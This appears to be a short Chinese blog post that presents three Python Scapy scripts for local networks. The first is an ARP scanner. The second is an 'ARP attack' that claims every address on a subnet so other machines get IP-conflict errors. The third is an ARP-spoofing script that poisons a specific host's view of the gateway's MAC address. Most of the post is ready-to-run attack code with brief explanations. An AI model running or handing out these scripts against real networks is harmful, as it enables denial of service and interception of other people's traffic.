用Scapy写的小应用（一）

  前几天,在学习Scapy,一个很强悍、很有名的封包工具,在BT5里面就有的，安装也是很简单的！是基于Python的一个交互式的工具。支持的协议广泛！但是不支持比较上层的协议，比如http。工作效率也不是很高，只是适合比较简单的小工具！

#!/usr/bin/python
"""
 LAN Mac Scan
 date 2013.4.22
"""
import sys, os
from scapy.all import *

if os.geteuid() != 0:
    print "This program must be run as root. Aborting."
    sys.exit()
if len(sys.argv) < 2:
    print "Please Use %s x.x.x" % (sys.argv[0])
    exit()
conf.verb = 0
ipscan = sys.argv[1] + ".0/24"
f = file("Mac_list.txt", 'w')
ans, unans = srp(Ether(dst = "FF:FF:FF:FF:FF:FF")/ARP(pdst = ipscan), timeout = 2)
print ans[0]
for snd, rcv in ans:
    print rcv
    list_mac = rcv.sprintf("%Ether.src% -> %ARP.psrc%")
    print rcv.sprintf("%Ether.src% -> %ARP.psrc%")
    f.write(list_mac+'\n')
f.close()

  上面的就是一个局域网扫描工具，可以扫描整个局域网上面的网关！

#!/usr/bin/python
"""
ARP attack
"""
import sys, os
from scapy.all import *
if os.geteuid() != 0:
    print "This program must be run as root. Aborting."
    sys.exit()

if len(sys.argv) < 2:
    print "Pkease Use %s x.x.x" % (sys.argv[0])
    exit()
attackIP = sys.argv[1] + ".0/24"
srploop(Ether(dst="FF:FF:FF:FF:FF:FF")/ARP(pdst=attackIP, psrc="192.168.100.1", hwsrc="00:66:66:66:66:66"), timeout=2)

  在局域网里面请求该网段里面所有的IP地址的Mac，在以太网中，主机就是以这种方式，来确定IP地址是否被占用了的！这段代码会占用掉所有的IP，让别人的机子出现IP地址冲突的错误！

#!/usr/bin/python
"""
 An ARP replies
"""
from scapy.all import *
AttackIP = raw_input("Please input the IP of GateWay:")
AttackIP_PC = raw_input("Please input the IP PC:")
srploop(Ether(dst = "00:0C:29:4B:B2:8C")/ARP(op = "is-at", \
 pdst = "192.168.100.9", hwdst = "00:0C:29:4B:B2:8C", psrc = AttackIP, hwsrc = "04:54:53:05:41:44"))

&nsbp;&nsbp;一个ARP欺骗，这里就是欺骗了一个特定的IP(ip = 192.168.100.9 MAC:00:0C:29:4B:B2:8C),告诉这个IP地址，网关的IP(AttackIP)的Mac是"04:54:53:05:41:44"，其实这个Mac你就可以随意改的啦！